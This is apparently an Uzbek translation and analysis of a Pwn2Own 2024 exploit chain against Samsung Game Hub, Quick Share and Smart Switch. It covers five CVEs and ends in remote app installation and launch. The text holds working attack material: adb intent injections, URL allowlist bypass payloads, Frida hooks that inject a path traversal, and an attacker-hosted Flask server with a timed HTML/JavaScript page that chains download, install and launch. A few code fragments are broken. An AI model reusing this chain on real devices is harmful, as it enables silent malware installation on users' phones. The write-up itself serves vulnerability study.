بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ
Ushbu maqola Ken Gannon tomonidan Pwn2Own 2024da kashf etilgan CVElarni o'rganadi. Maqsad ularning eksploit texnikalarini va asosiy muammolarni nazorat ostidagi va axloqiy muhitda tushunishdir. Manba.
Gaming Hub : (com.samsung.android.game.gamehome) version 7.1.01.7
Quick Share: (com.samsung.android.app.sharelive) version 13.6.53.6
Quick Share Agent: (com.samsung.android.aware.service) version 3.5.19.33
Smart Switch Agent: (com.sec.android.easyMover.Agent) version 2.0.02.24
-----------------------------------------------------------------------------
Author: Ken Gannon
CVE Identifier: CVE-2024-49419 , CVE-2024-49418 , CVE-2024-49420 , CVE-2024-49421 , CVE-2024-49413CVE-2024–49419
WebView-da URL injekshni (com.samsung.android.game.gamehome)
Intent #1ni kuzatish
Bu yerdagi birinchi qadam MainActivityni chaqirish va kiritilgan ma'lumotlar qayerga ketayotganini kuzatish bo'ladi
Demak, birinchi navbatda bu yerda sxema gamelanucher ekanligini tekshiradi, keyin pathni ajratadi va switch caseda tekshiradi, birinchi tekshiruv externalweb uni qayta ishlash uchun tashqi brauzerga yuboradi.
adb shell am start -n com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity -a android.intent.action.VIEW -d "gamelauncher://com.samsung.android.game.gamehome/externalweb?url=https://google.com"Endi gmp deb nomlangan boshqa yo'lni ko'rishimiz mumkin, bu yo'l xuddi shu URLparametrini boshqaradi, lekin uni GmpWebActivity da yuklaydi.
adb shell am start -n com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity -a android.intent.action.VIEW -d "gamelauncher://com.samsung.android.game.gamehome/gmp?url=https://google.com" 
Demak, bu yerda biz o'z URLimizni WebViewga yuklash uchun zarur yo'lni topdik, lekin JavaScript o'chirilgan holda davom etish uchun...
CVE-2024–49418
WebViewda JavaScriptni yoqish uchun URL tekshiruvini chetlab o'tish (com.samsung.android.game.gamehome)
Intent #2ni kuzatish
GmpWebActivityga maqsadli ta'sir yuborilgandan so'ng, u WebViewda URL yuklanishidan oldin ko'plab funksiyalardan o'tadi, keling tekshirib ko'ramiz.
WebView ekanligini bilgandan so'ng u i == 3 ni chaqiradi, keyin gmpDeepLinkUtildan J klassini chaqiradi, so'ng URL olish va uni E0ga yuborish amalga oshadi.
q0 URL sxema va yo'lini tekshiradi
Yuklanishidan oldin WebViewda konfiguratsiyani o'rnatish uchun V0 ni yuklaydi
lekin URLni yuklashdan oldin uni tekshirish uchun Fga yuboradi
Ular GmpProviderImplda joylashgan, ko'rib turganingizdek "e" - "k" massivini chaqiradi, keyin ichidagi URLlar uchun aylanma yaratadi va "h" boshqa URLlarni tekshiradi, demak ba'zi domenlar uchun oq ro'yxat mavjud, biz uni 2 usul bilan chetlab o'tishimiz mumkin.
Oq ro'yxatga kiritilgan ostdomenli domen sotib oling
"gamelauncher://com.samsung.android.game.gamehome/gmp?url=https://us.mcsvc.samsung.com.attacker.com?location=https://google.com"URL tekshiruvini aylanib o'ting
"gamelauncher://com.samsung.android.game.gamehome/gmp?url=https://us.mcsvc.samsung.com\@google.com"Endi P0ni yuklashimiz ham-da Javascriptni ishga solishimiz mumkin.
D0ga qaytamiz
Javascript ishga tushadigan qilindi.
CVE-2024–49420
Eksport qilingan Activitylarni ishga tushirish uchun Webviewdan ma'lumotlar orqali "start Activity"ni bajarish (com.samsung.android.game.gamehome)
Intent #3ni kuzatish
Endi bu WebView bizga har qanday eksport qilingan activity intent:// ni chaqirishga ruxsat beradimi yoki yo'qligini ko'rishimiz kerak, shuning uchun biz parseURIni qidirishni boshlaymiz - u intent:// havolalarni Intent obyektlarida tahlil qilish uchun yaratilgan, natijada u ularni to'liq boshqaradi.
Demak, hozirgacha agar sxema har qanday narsa bo'lsa "i" yuklanadi, agar sxema intent:// bo'lsa o'zi yuklanadi
Demak, endi ushbu "a"ga erishishimiz kerak, bu intent:// ni yuklaydi va eksport qilingan activitylarni ochadi
Yuklama(payload) vaqti
Bu yerda yuklama Game Hubni ochadi, keyin attacker.com ga yo'naltiradi va JavaScript va flaskdan foydalanib, maqsadli ilovaga yangi intent:// yuborish uchun qayta yo'naltiradi.
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"><title>Launch</title>
</head>
<body>
<h1>
<a href="intent://com.samsung.android.game.gamehome/gmp?url=https%3A%2F%2Fus.mcsvc.samsung.com%40attacker.zerodoridlabs.com%2F%3Flocation%3Dlaunch#Intent;scheme=gamelauncher;action=android.intent.action.VIEW;component=com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity;end">
Launch via GameHub
</a>
</h1>
<!-- (B) Auto-redirect: only when ?location=launch -->
<script>
const params = new URLSearchParams(window.location.search);
const loc = (params.get('location') || '').toLowerCase();
if (loc === 'launch') window.location.replace('/launch');
</script>
</body>
</html>
from pathlib import Path
from flask import Flask, redirect
BASE = Path(__file__).resolve().parent
app = Flask(__name__, static_folder=str(BASE), static_url_path="")
@app.route("/")
def root():
return app.send_static_file("index.html") # / and /index.html both work now
@app.route("/launch")
def launch_share():
return redirect("intent:#Intent;action=android.intent.action.MAIN;category=android.intent.category.LAUNCHER;component=com.withsecure.dz/com.WithSecure.dz.activities.MainActivity;end", code=302)
if name == "__main__":
ssl_context = ("/etc/letsencrypt/live/zerodoridlabs.com/fullchain.pem",
"/etc/letsencrypt/live/zerodoridlabs.com/privkey.pem")
app.run(host="0.0.0.0", port=443, debug=False, ssl_context=ssl_context)
CVE-2024–49413
O'rnatishdan oldin ilova imzosi yetishmovchiligi (com.sec.android.easyMover.Agent)
Eslatma: Gaming Hub va Smart Switch zaif Activity ustidan nazoratga ega
public final void onCreate(Bundle bundle) {
Log.i("[SmartSwitchAgent]SsmUpdateCheckActivity", "onCreate");
super.onCreate(bundle);
Intent intent = getIntent(); // Intent goes here
if (intent == null) {
finish();
} else {
this.TheAction = intent.getAction();
this.TheExtra = intent.getStringExtra("MODE"); // we will see it later
if (!"com.sec.android.easyMover.Agent.WATCH_INSTALL_SMART_SWITCH".equals(this.TheAction)) {
Log.w("[SmartSwitchAgent]SsmUpdateCheckActivity", "Undefined action! - " + this.TheAction);
finish();
}
}
d.a(getApplication());
Context applicationContext = getApplicationContext();
this.f1116o = applicationContext;
this.PackageInfo = g.PackageInfoVersion(applicationContext, "com.sec.android.easyMover");
Log.i("[SmartSwitchAgent]SsmUpdateCheckActivity", "Current SSM ver : " + this.PackageInfo);
}
public final void g(String str, String str2) { // The Installing point
String strConcat = "startCopyAndInstall - state : ".concat(a4.a.r(this.f2919a));
String str3 = f2917r;
Log.i(str3, strConcat);
int i5 = this.f2919a;
if (i5 == 2 || i5 == 5 || i5 == 4) {
Log.d(str3, "update package on going.");
return;
}
this.f2919a = 2;
if (str == null || str2 == null) {
b(true);
return;
}
Log.i(str3, "startApkCopy");
this.f2919a = 4;
ArrayList arrayList = this.f2932n;
int size = arrayList.size();
while (true) {
size--;
if (size < 0) {
break;
} else {
((q4.e) ((x) arrayList.get(size))).b();
}
}
long j5 = this.f2921c;
if (j5 > 0) {
this.f2933o.sendEmptyMessageDelayed(3000, j5);
}
if (!s4.a.k(this.f2931m, str, str2, new f.b(this))) {
b(false);
} else {
Log.i(str3, "startApkInstall - apkFilePath : ".concat(str));
e(str, null);
}
}
Ko'rib turganingizdek, biz "g"ga yetganimizdan keyin o'rnatish jarayoni boshlanadi, endi maqsad apkmizni telefonda yuklab olish va uni o'rnatishdir.
CVE-2024–49421
Hujumchi telefondan ma'lumot o'tkazishda Jildga O'tish (Path Traversal) hujumi (com.samsung.android.aware.service)(com.samsung.android.app.sharelive)
Keling, bu qanday ishlashini ko'raylik. Bu Samsung tomonidan fayllarni boshqa foydalanuvchilar bilan yaqin atrofda ulashish yoki o'tkazish uchun QR kod orqali yuborish uchun moslashtirilgan tezkor ulashish agenti.
<html>
<body>
<h1>
</h1>
</body>
</html>
Demak, ayni damda Quick Sharedan foydalanib, biz apkni /sdcard/Download/Quick Share/ ga yuklab qo'yishimiz mumkin, lekin Smart Switch unga kira olmaydi.
Jildga o'tish com.samsung.android.aware.service
Qabul qiluvchi
Hozirgacha ilova hujumchi telefondan ulanish va ma'lumotlarni qanday qabul qilishini ko'rdik.
Men uni yuboruvchi tomondan ko'rishga harakat qildim, lekin topa olmadim, shuning uchun keling uni qabul qiluvchi tomondan ko'raylik va menimcha ikkalasi ham json yaratish va uni qabul qilish uchun bir xil usuldan foydalanadi.
Ushbu n JSONObjectda hujumchidan jabrlanuvchi telefonga yuborilgan maxsus xabar mavjud, keyin biz ushbu n ni hook qilishimiz va yuklab olish kodini yaratayotganda u nimani o'z ichiga olishini ko'rishimiz mumkin, fayl yo'lini o'zgartirish uchun unga injekshn qilishga harakat qilganimizda shunday ko'rinadi.
console.log("script loaded");
Java.perform(function() {
var AttackerClass = Java.use('e2.t');
AttackerClass.n.overload('org.json.JSONObject', 'e2.h', 'boolean').implementation = function(a,b,c) {
if (a.has("Path")) {
a.put("Path","/../../../../../../GPUWatch_Dump/html/")
}
var ret_val = this.n(a,b,c);
console.log("send json: " + a + "\n" + "send bytes: " + ret_val + "\n")
return ret_val;
}
});
Biz bu yerda path va name ustida Regex borligini topdik, lekin agar bu this.f2671g.x true bo'lsa, name va path birinchi blokka o'tadi va u yuborilgan holda, hech qanday filtrsiz qabul qilinadi.
this.f2671g.x nima? Biz bu metodni qidirganimizda u JSONObjectda IsPrivateShare deb nomlangan kalit sifatida ketadi, biz uni tezkor agentda bosish orqali yoki Download Code yaratishdan oldin uni patch qilish uchun Fridadan foydalanib true qilishimiz mumkin.
Demak, JSONObjectda parametr mavjud, biz uni filtrsiz qismga xabarni o'tkazish uchun true ga o'zgartirishimiz mumkin.
console.log("script loaded");
Java.perform(function() {
var AttackerClass= Java.use('e2.t');
AttackerClass.n.overload('org.json.JSONObject', 'e2.h', 'boolean').implementation = function(a,b,c) {
if (a.has("IsPrivateShare")) {
a.put("IsPrivateShare", true)
}
if (a.has("Path")) {
a.put("Path","/../../../../../../GPUWatch_Dump/html/")
}
var ret_val = this.n(a,b,c);
console.log("send json: " + a + "\n" + "send bytes: " + ret_val + "\n")
return ret_val;
}
});
Demak, endi biz ushbu skriptdan foydalanib Pathni GPUWatch_Dump ga o'zgartirishimiz mumkin, lekin, o'zi bu nima?
com.samsung.gpuwatchapp nima o'zi?
GPUWatch - bu Samsung dasturchilari uchun ilova ichidagi GPU faoliyatini real vaqt rejimida kuzatishni ta'minlaydigan vositadir. U dasturchilarga GPU foydalanish va unumdorlik ko'rsatkichlarini to'g'ridan-to'g'ri ekranda kuzatish imkonini beradi, bu esa disk debugging va optimallashtirishda yordam beradi. Men o'zimning Samsung telefonlarimdan qidirganimda uni faqat do'stimning S10 va S25 telefonlarida topdim, lekin u allaqachon Quick Share va Agentni yangilagan, shuning uchun to'liq eksploitni yasash uchun telefon topa olmadim.
GPUWatchning apksida biz uni apk ssm_urini Smart Switchga o'rnatish uchun yuborish uchun ishlatishimiz mumkinligini topdik.
Endi tarkib qanday tashkil topganini bilamiz.
content://com.samsung.gpuwatchapp.HtmlDumpProvider/drozer.apk
To'liq yuklama
from pathlib import Path
from flask import Flask, redirect
BASE = Path(__file__).resolve().parent
app = Flask(__name__, static_folder=str(BASE), static_url_path="")
@app.route("/")
def root():
return app.send_static_file("index.html") # / and /index.html both work now
download_code = "your_download_code_here"
ssm_uri = "content://com.samsung.gpuwatchapp.HtmlDumpProvider/drozer.apk"
@app.route("/download")
def launch_quickshare():
return redirect("intent://qr.quickshare.samsungcloud.com/"+download_code+";Intent;component=com.samsung.android.app.sharelive/com.samsung.android.app.sharelive.presentation.applink.QrCodeAppLinkActivity;scheme=https;end;", code=302)
@app.route("/install")
def launch_install():
return redirect("intent:#Intent;component=com.sec.android.easyMover.Agent/com.sec.android.easyMover.Agent.ui.SsmUpdateCheckActivity;action=com.sec.android.easyMover.Agent.WATCH_INSTALL_SMART_SWITCH;S.MODE=DIALOG;S.ssm_action=anything;S.ssm_uri="+ssm_uri+";end", code=302)
@app.route("/launch")
def launch_drozer():
return redirect("intent:#Intent;component=com.withsecure.dz/com.WithSecure.dz.activities.MainActivity;end", code=302)
if name == "__main__":
ssl_context = ("/etc/letsencrypt/live/zerodoridlabs.com/fullchain.pem",
"/etc/letsencrypt/live/zerodoridlabs.com/privkey.pem")
app.run(host="0.0.0.0", port=443, debug=False, ssl_context=ssl_context)
<h1>
<a id="start"
href="intent://com.samsung.android.game.gamehome/gmp?url=https%3A%2F%2Fus.mcsvc.samsung.com%40attacker.zerodoridlabs.com%2F%3Flocation%3Dlaunch#Intent;scheme=gamelauncher;action=android.intent.action.VIEW;component=com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity;end">
Start
</a>
</h1>
<script>
const STEP = 15000; // 15s
const qs = new URLSearchParams(location.search);
const host = qs.get('attacker') || location.host;
const base = (host.includes('://') ? '' : location.protocol + '//') + host;
function go(p){ location.href = base + p; }
document.getElementById('start').addEventListener('click', () => {
setTimeout(() => go('/download'), 2000); // after 2s
setTimeout(() => go('/install'), 2000+STEP); // +15s
setTimeout(() => go('/launch'), 2000+STEP*2); // +15s
}, { once:true });
</script>
Xulosa
Foydalanuvchi Startni bosadi
Game Hub JavaScript bilan WebViewni ochadi
Game Hub Yuklab olish kodi bilan tezkor ulashishni ochadi va Hujumchi Ilovasini yuklab oladi
Quick share Agent uni GPUWatch_dump/htmlga nusxalaydi
Smart Switch Hujumchi Ilovasini o'rnatish uchun GPUWatch content providerdan ssm_urini oladi
Game Hub Hujumchi Ilovasini Ishga tushiradi → RCE
Men qo'limdan kelganining hammasini qildim, shuning uchun agar biror narsani o'tkazib yuborgan bo'lsam yoki biror narsa aniq bo'lmasa, kechirasiz, lekin agar savollaringiz bo'lsa, menga LinkedIn orqali murojaat qilishingiz mumkin va men sizga yordam berish uchun qo'limdan kelganini qilaman. Shuningdek, Kenning "Chainspotting 2" ma'ruzasini tomosha qilishni unutmang, bu men uchun eng yaxshisi. Shuningdek, bir necha yil oldin xuddi shu sarlavha bilan chiqqan "ChainSpotting" deb nomlangan yana bitta qo'llanmasi bor.
ٱلسَّلَامُ عَلَيْكُمْ وَرَحْمَةُ ٱللهِ وَبَرَكَاتُهُ
Tarjimon izohi: maqola muallif mehnatini himoya qilgan holatda to'liq taqdim etildi
